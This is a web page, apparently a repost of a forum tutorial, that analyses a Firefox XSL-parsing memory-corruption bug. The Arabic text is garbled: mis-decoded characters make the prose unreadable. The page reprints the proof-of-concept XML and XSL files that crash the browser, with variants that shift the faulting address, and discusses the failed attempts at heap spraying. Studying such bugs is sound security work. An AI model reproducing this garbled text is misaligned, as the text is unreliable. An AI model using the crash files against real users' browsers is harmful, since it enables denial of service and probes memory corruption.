ÊÍáíá ËÛÑÉ Firefox Xsl Parsing Remote Memory Corruption : www.ãäÞæá.com

ÈÊÜÜÜÜÜÇÑíÎ :

2/26/2011 6:05:54 AM

ÇáÝÜÜÜÜÜÜÜÜÆÉ

ÇáÊÚáíÞÇÊ	ÇáãÔÇåÏÇÊ	ÇáÊÞííãÇÊ
0	1757	0

ØÈÇÚÉ

ÃÎÈÑ ÕÏíÞ

ãæÖæÚÇÊ ãÊÚáÞÉ

FireCal 1.8 Mozilla Firefox 3.6.11 ÇáÜãÊÜÕÝÜÍ ÇáÜÚÜãáÇÞ Ýì ÇÕÏÇÑå ÇáÃÎíÑ Mozilla Firefox 8.0 Beta 5 Taskkill æ ÇáåÝæÇÊ ÇáÈÑãÌíÉ ÅÓÊÛáÇá ËÛÑÉ Format String áÊÎØí ÅÛáÇÞ ÇáÚãáíÇÊ ËÛÑÉ ÃãäíÉ Ýí Åã ÅÓ Åä ÊåÏÏ åæÊãíá

ãÎÊÇÑÇÊ ãä äÝÓ ÇáÝÆÉ

Íãá ÈÑäÇãÌ Google Maps Image Downloader 4.25 ãÌÇäÇ PhotoCard :ÈÑäÇãÌ áÜÏãÌ ÇáÕæÑ æÇáßÊÇÈÉ ÚáíåÇ - ááãæÈÇíá

ÊÍáíá ËÛÑÉ Firefox Xsl Parsing Remote Memory Corruption

ÇáäÇÞá : elmasry | ÇáÚãÑ :42 | ÇáßÇÊÈ ÇáÃÕáì : DATA_SNIPER | ÇáãÕÏÑ : www.arabteam2000-forum.com

ßáãÇÊ ãÝÊÇÍíÉ :

ÊÍáíá ËÛÑÉ Firefox Xsl Parsing

ÇáÓáÇã Úáíßã.
ÈÓã Çááå ÇáÑÍãä ÇáÑÍíã.
ÇÑÏÊ Çä ÇÚÑÌ æ ÇÔÑÍ ÔíÆ ãåã æåæ ËÛÑÉ ÇáÝÇíÑÝæßÓ ÇáÊí ÙåÑÊ í ÇáÂæäÉ ÇáÃÎíÑÉ.
æáÑÈãÇ ßËÑ ÇáÊÕÚíÏ ÚáíåÇÇ ÈÃäåÇ ËÛÑÉ ÎØíÑÉ ÞÏ ÊåÏÏ ÇáÃãä ÇáÔÎÕí ááãÓÊÎÏãíä¡ØÈÚÇ æÈÛÖ ÇáäÙÑ Úä äæÚíÉ ÇáËÛÑÉ ÝÅäåÇ ÊÚÊÈÑ ÎØíÑÉ ÅÐÇ ÊæÝÑÊ ÔÑæØ ÃÎÑì.
áßä ÇäÇ ÇÞæá ÍÓÈ ÊÍáíáí ÇáÈÓíØ Ãä ÚãáíÉ ÅÓÊÛáÇá ÇáËÛÑÉ ÇáãæÌæÏÉ Ýí åÐÇ ÇáÑÇÈØ ãÓÊÍíá ÈÔßáå ÇáÍÇáí æÓÃæÖÍ ÈÚÏ Þáíá¡Ýáæ Çä ÚãáíÉ ÇáÅÓÊËãÇÑ ÇáËÛÑÉ ßÇäÊ ÓåáÉ áÅÓÊËãÑåÇ ãä æÖÚåÇ Ýí ãíá ææÑã Ýåæ ãÚÑæÝ
ÇáËÛÑÉ ÇáÃæáì Mozilla Firefox XSL Parsing Remote Memory Corruption PoC 0day
ÊÚÑíÝ:
ÇáËÛÑÉ åí ÚÈÇÑÉ Úä ÎØÃ Ýí ãÚÇáÌÉ ãáÝÇÊXSL ÈÇáÊÍÏíÏ ÃËäÇÁ ÊÍæíá ãÓÊäÏ XML ÈæÇÓØÉ XSLT
ãÇåæ XSL:
Èßá ÈÓÇØÉ åí áÛÉ ÊÓÇÚÏß Úáì ÚÑÖ ãáÝÇÊ XML ÈÇáÔßá ÇáÐí ÊÑÛÈ Ýíå ÃäÊ.
áäÝÑÖ Ãäå áÏíß ãáÝ XML æÊÑíÏ ãÚÇáÌÊå Úä ØÑíÞ ÊØÈíÞ(web app) ãÚíä¡ áßä ÃáÇ ÊÑì Ãä ÇáÊÚÇãá ãÚå Óíßæä ÕÚÈ ÍÊì ÈÇáÊÚÇãá ãÚ parser áÐáß ÞÇã ÇáãØæÑæä ÈÊØæÑí áÛÉ ÈÑãÌÉ ÊÓÇÚÏß Ýí ÚÑÖ ÇÈíÇäÇÊ ÇáãæÌæÏÉ Ýí XML ÈÔßá ÇáÐí ÊÑÛÈ.
ãÇåæ XSLT :
ÈÕÝÉ ÚÇãÉ åí áÛÉ ÊÓÇÚÏß Úáì ÊÍæíá ãÓÊäÏ XML Åáì ãÓÊäÏ ÂÎÑ ÓæÇÁÇ ßÇä XML Çæ HTML Çæ PDF æåí ÊÓÇÚÏ ßËíÑÇ Ýí ÚÑÖ ãÓÊäÏÇÊ XML Úáì ÇáæíÈ¡æ ÊÚáíãÇÊ áÛÉ XSLT Êßæä ãÖãäÉ Ýí ãáÝÇÊ XSL æíÊã ÅÓÊÏÚÇÆåÇ ãä ÏÇÎáåÇ.
ÔÇåÏ ÇáÕæÑÉ.
ÇÑÝÞ ÕæÑÉ : monthly_04_2009/post-88726-1238927784.png
ÇáÕæÑÉ ãä Wikipedia.
ÝßãÇ ÊÔÇåÏ åäÇ ãÓÊäÏ XML æ ßæÏ XSLT Úáì Çáíãíä æÇáäÇÊÌ åæ ãÓÊäÏ ÂÎÑ æãä Çáããßä Ãä íßæäí plain text ááÚÑÖ Ãæ ÍÊì XML.
äÚæÏ ááËÛÑÉ ßãÇ ÞáäÇ Ãä ÇáËÛÑÉ ÚÈÇÑÉ Úä ÎØÃ Ýí ãÚÇáÌÉ ãáÝÇÊ XSL ÈÇáÊÍÏíÏ ÃËäÇÁ ÇáÊÚÇãá ãÚ ÃßæÇÏ XSLT áÊÍæíá ãÓÊäÏ XML Åáì äÕ ÞÇÈá ááÚÑÖ.
äáÞí äÙÑÉ Úáì ÇáßæÏ.
ßæÏ ãáÝ xmlcrash.xml

plain text

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="xslt.xsl"?>
<root xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
        <item1 id="AAAAAAA" />
        <item2 id="AAAAAAAAA" label="AAAAAAAAAAAA"/>
</root>

ßæÏ ãáÝ XSL
xslt.xsl

plain text

<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
        <xsl:key name="label" match="item2" use="w00t()"/>
        <xsl:template match="root">
                                        <xsl:for-each select="//item1">
                                                <xsl:call-template name="item1" />
                                        </xsl:for-each>
        </xsl:template>
        <xsl:template name="item1">
                                <xsl:for-each select="key('label', 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')">
                                </xsl:for-each>
        </xsl:template>
</xsl:stylesheet>

ØÈÚÇ ÇáßæÏ ÇáËÇäí åæ ÇáÐí íÍÏË ÇáÎØÃ.
äÊØÑÞ ÇáÂä áÔÑÍ ÈÓíØ áááãíßÇäíÒã æ Úãá ÇáËÛÑÉ.
æßãÇ ÞáäÇ ÓÇÈÞÇ Ãä ãáÝÇÊ XML íãßä Ãä ÊÓÊÚãá ãáÝÇÊ XSL ãä ÃÌá ÚÑÖ ãÍÊæíÇÊåÇ áÐáß ÝÇáÛÉ XSL åí Style Sheet ÇáÎÇÕ ÈÇáÜ XML .
ßãÇ ÊÑæä Ýí ÇáßæÏ ÇáÃæá Ãä Êã ÅÓÊÏÚÇÁ ãáÝ xslt.xsl åäÇ:

plain text

<?xml-stylesheet type="text/xsl" href="xslt.xsl"?>

áßí íÊã ÊØÈíÞ ÇáÓÊÇíá Úáì

plain text

        <item1 id="AAAAAAA" />
        <item2 id="AAAAAAAAA" label="AAAAAAAAAAAA"/>

æíÚÑÖåã ØÈÞÇ ááßæÏ ÇáãßÊæÈ ÏÇÎá ãáÝ XSL .
ÇáßæÏ ÇáãßÊæÈ ÝæÞ áíÓ ÅáÇ ãÌãæÚÉ ãä nodes áåÇ ÌÐÑ ÑÆíÓí ÅÓãå root¡ æÈåÇ Êáß ÇáÍÑæÝ ãÚ ÇáÚáã Çäå íãßä Ãä Êßæä ÍÑæÝ Çæ ÇÓãÇÁ ÃÎÑì æßãáÇÍÙÉ ÝÅä ÇáãÍÇÑÝ "AAAAAAAAA" áíÓ åí ÇáÊí ÊÍÏË ÇáÎØÃ

ääÊÞá áßæÏ XSL
áä ÃÑÔÍå ÈÇáÊÝÕíá ÝÐáß íÊØáÈ ãäí ÔÑÍ ÊÚáíãÇ áÛÉ XSL áßä ÓÃÍÇæá ÇáÅÎÊÕÇÑ.
ØÈÚÇ áÇ ÈÏ Çäß ÞÏ ÅØáÚÊ Úáì áÛÉ ÈÑãÌÉ ãÚíäÉ ßäÊ ÞÏ ÑÃíÊ ÝíåÇ ÇáÊÚáíãÇÊ ãËá for æ for ...each æ if .
ÝÇáÃãÑ íäØÈÞ Úáì åÐå ÇááÛÉ áßä ÈÔßá ãÛÇíÑ Ýí ßÊÇÈÉ ÇáÚÈÇÑÉ ÇáÈÑãÌíÉ ÝÞØ.
ÝßãÇ ÊáÇÍÙ ÊÚáíãÉ for ....each Êã ßÊÇÈÊåÇ ÈÇáÔßá ÇáÊÇáí

plain text

<xsl:for-each

æ ÇáÊí ÊäÊåí ÈÜ:

plain text

</xsl:for-each>

æÈÚÏåÇ select ÇáÊí ÊÍÏÏ ãßÇä ÊØÈíÞ ÇáÃãÑ Ýí ãÓÊäÏ XML .
ÈÚÏåÇ íÃÊí ÇáÃãÑ

plain text

 <xsl:call-template name="item1" />

ÇáÐí íÓÊÏÚí template ÇáÊÇáí:

plain text

   <xsl:template name="item1">
                                <xsl:for-each select="key('label', 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')">
                                </xsl:for-each>
        </xsl:template>

åäÇ íÞæã åÐÇ template ÈÅÓÊÚãÇá ÇáÏÇáÉ key ÇáÊí ÊÞæã ÈÚãá indexing ááÝÑæÚ ÇáÎÇÕÉ ÈÜ ãÓäÏ XML ÝÊÎíá Ãä ãÓÊäÏ XML ßÈíÑ ÌÏÇ æÈå ÝÑæÚ ßËíÑÉ æÃÑÞÇã æÃÚÏÇÏ ßËíÑÉ ÝÅä ÚãáíÉ ÅäÔÇÁ ÇáÃÓãÇÁ ÇáÏáÇáíÉ ÓÊÓÇÚÏ Ýí ÇáÊÚÇãá ãÚ ÇáãÓÊäÏ æíÊã Ðáß ÈÅÓÊÚãÇá ÇáÏÇáÉ key¡ÝãËáÇ ÚãáíÉ indexing Ýí ÇáßÊÈ ¡ áäÝÑÖ Ãäß ÊÈÍË Úä ßáãÉ Çæ ÚÈÇÑÉ ÓÊÊæÌå áá index (æ áíÓ content) æÓíÚØíß ÑÞã ÇáÕÝÍÉ ÇáÊí íãßä Ãä ÊÌÏåÇ ÝíåÇ¡ æ ÇáÃÃãÑ íäØÈÞ Úáì ãáÝÇÊ XML ÈÍíË Çäß ÊÚØíå ÇáÅÓã æåæ íÚØíß ÇáÚÞÏÉ æ ÇáÚäÕÑ ÈÇáÖÈØ.
ÇáãÔßáÉ ãæÌæÏ Ýí åÐÇ ÇáßæÏ ÈØÑíÞÉ ÛíÑ ãÈÇÔÑÉ¡ áÃäå Ýí ÇáÈÏÇíÉ Êã ÇáÅÚáÇä Úä key Ýí åÐÇ ÇáÓØÑ:

plain text

<xsl:key name="label" match="item2" use="w00t()"/>

ÚäÏ ÇáÃÅÚáÇä Úä key íÊã ÇÎÐ ËáÇË äÞÇØ ÈÚíä ÇáÅÚÊÈÇÑ:
1-ÇáÅÚáÇä Úä ÅÓã key æÐáß ÈßÊÇÈÉ name="ÅÓã ÇáãÝÊÇÍ"
2-ÇáÎÇÕíÉ ÇáËÇäíÉ åí mach íÚäí ÈåÇ ÊÍÏíÏ ÇáÚÞÏÉ (node) ÇáãÑÇÏ Úãá ndexing áåÇ.
3-use æ åí ÇáÊí ÊÌÚá ÇáãÝÊÇÍ ÇßËÑ ÊÎÕíÕÇ ÈÍíË íãßä ãä ÎáÇáåÇ ÊÚíä ÚäÕÑ ãä ÇáÚÞÏÉ ÇáÑÆíÓíÉ ÇáÊí Êã ÅÎÊíÇÑåÇ Ýí mach.
áßä Ýí ßæÏ ÇáÅÓÊÛáÇá áã íÊã ÊÍÏíÏ use ÈÔßá ÕÍíÍ áßä Êã æÖÚåÇ ÈÔßá ÚÔæÇÆí æåäÇ íÍÏË ÇáÎØÃ.
áßí ÊÊÃßÏ ÌÑÈ æÅÓÊÈÏá w00t() ÈÜ áÇ ÔíÆ íÚäí ÏÚåÇ ÝÇÑÛÉ æÓÊÑì ãÇÐÇ ÓíÍÏË.
ÅÐÇ åäÇ ÇáãÔßáÉ.
áÞÏ ÞãÊ ÈÈÚÖ ÇáÊÚÏíáÇÊ Úáì ÇáßæÏ ÝÌÚáÊå ÈåÐÇ ÇáÔßá (ÅÎÊÕÑÊå).
xmlcrash.xml.

plain text

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="xslt.xsl"?>
<root xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
        <item1 id="datasniper" />
</root>

xslt.xsl

plain text

<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
        <xsl:key name="label" match="item1" use=""/>
        <xsl:template match="root">
                                   <xsl:for-each select="key('label', @item1)">
                                </xsl:for-each>
        </xsl:template>
</xsl:stylesheet>

ÈÚÏ ÊÌÑÈÉ ÇáßæÏ ÇáãæÌæÏ Ýí Ãæá ÇáÏÑÓ ÓÊÑì ãËá åÐå ÇáÕæÑÉ.

Resized to 81% (was 800 x 570) - Click image to enlarge Posted Image

ßãÇ ÊáÇÍÙ ÇáÔÑÍ ÇáãßÊæÈ Ýí ÇáÕæÑÉ áÃä ÚãáíÉ ÇáÃäÊÞÇá ááãßÇä ÇáãæÌæÏ ÝíEAX ÈÇÁÊ ÈÇáÝÔá áÚÏã ÅÍÊæÇÁ EAX Úáì ãßÇä valid Çæ ãßÇä ãÊÇÍ Ýí ÇáÐÇßÑÉ.
æåÐÇ ãÚÑæÝ ÈßËÑÉ Ýíá ËÛÑÇÊ ÇáãÊÕÝÍÇÊ æ ááÅØáÇÚ ÃßËÑ ÃÏÎá åÐÇ ÇáÑÇÈØ
ËÛÑÉ ÇáãÊÕÝÍ äÙÑÉ ÊÍáíáÉ ãä ÇáÏÇÎá, ÔÑÍ æÊÍáíá áËÛÑÉ XML Parsing ÇáÃÎíÑÉ Ýí ÇáãÊÕÝÍ
íÔÑÍ ÚãáíÉ ÊÍáíá ËÛÑÉ ÇáãÊÕÝÍ æ åí ãä äæÚ åÐå ÇáËÛÑÇÊ.
Ýí Ðáß ÇáÏÑÓ ßäÊ ÞÏ ÊäÇæáÊ ãæÖæÚ heap spray æ ÓÃäÞá ÌÒÁÇ ãä Ðáß:

ÝÊÎíá áæ Ãä ÇáÎØÃ ßÇä íÍÏË áãÇ íßæä EAX=0A0A0A0A ÓíÍÏË äÝÓ ÇáÎØÃ æÓÊÙåÑ ÇáÑÓÇáÉ ÇáÊÇáíÉ
Access Violatiojn when reading [0A0A0A0A]
ÝÇáÃãÑ Óåá æÐáß ÈãÌÑÏ ÊÖÎíã ÇáßæãÉ æÇáÒíÇÏÉ ÝíåÇ Úä ØÑíÞ ÚãáíÉ ÇáÍÌÒ ÝÅä åÐÇ ÇáÚäæÇä ÓíÕÈÍ ãæÌæÏ æÓíÊã ÇáÞÝÒ Åáì ãÍÊæÇå.
áßä ÇáãÔßáÉ æåæ Ãä EAX=00000000 áÐáß ÝÅä ÚãáíÉ Spraying ãÓÊÍíáÉ ÝßáäÇ íÚã Ãä ÇáÚäæÇä 00000000 áÇ íãßä ÅÓÊÚãÇáå ãä user mode áÐáß ÊÈÎÑ Íáã ÇáÅÓÊËãÇÑ.
åäÇáß Ããá áÚãá ÅÓÊËãÇÑ æ åæ ÇáÊÚÏíá Úáì ÇáßæÏ æÊÛíÑå ÝáÞÏ ÞãÊ ÈÈÚÖ ÇáÊÚÏíáÇÊ Úáì ÇáßæÏ ÝÊÛíÑ ÇáÚäæÇä ãä
00000000 Åáì 00000031 ÈåÐÇ ÇáÊÚÏíá:

plain text

<?xml version="1.0" encoding="UTF-8"?>

<xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">

        <xsl:key name="label" match="item1" use=""/>

        <xsl:template match="root">
                                   <xsl:for-each select="key('label', @item1)">
                                </xsl:for-each>
        </xsl:template>

</xsl:stylesheet>

æÛíÑÊå Åáì ÇáÚäæÇä 017ED9A0
ÈåÐÇ ÇáßæÏ Ýí ãáÝ XSL :

plain text

<?xml version="1.0" encoding="UTF-8"?>

<xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">

        <xsl:key name="label" match="item1" use=""/>

        <xsl:template match="root">
                                   <xsl:value-of select="key('label', @item1)">
                                </xsl:value-of>
        </xsl:template>
</xsl:stylesheet>

Åáì åäÇ íäÊåí åÐÇ ÇáÊÍáíá ÇáÈÓíØ ááËÛÑÉ.
Çí ÅÓÊÝÓÇÑÇÊ Çæ ÅÖÇÝÇÊíÑÌì ßÊÈÊåÇ.
æÇáÓáÇã Úáíßã.

ßáãÇÊ ãÝÊÇÍíÉ :

ÊÍáíá ËÛÑÉ Firefox Xsl Parsing

ãæÖæÚÇÊ ãÊÚáÞÉ

ãÎÊÇÑÇÊ ãä äÝÓ ÇáÝÆÉ

ÊÍáíá ËÛÑÉ Firefox Xsl Parsing Remote Memory Corruption

ÇáäÇÞá : elmasry | ÇáÚãÑ :42 | ÇáßÇÊÈ ÇáÃÕáì : DATA_SNIPER | ÇáãÕÏÑ : www.arabteam2000-forum.com

ÊÚáíÞÇÊ ÇáÒæÇÑ ()

Copyrights© 2007 Manqol.com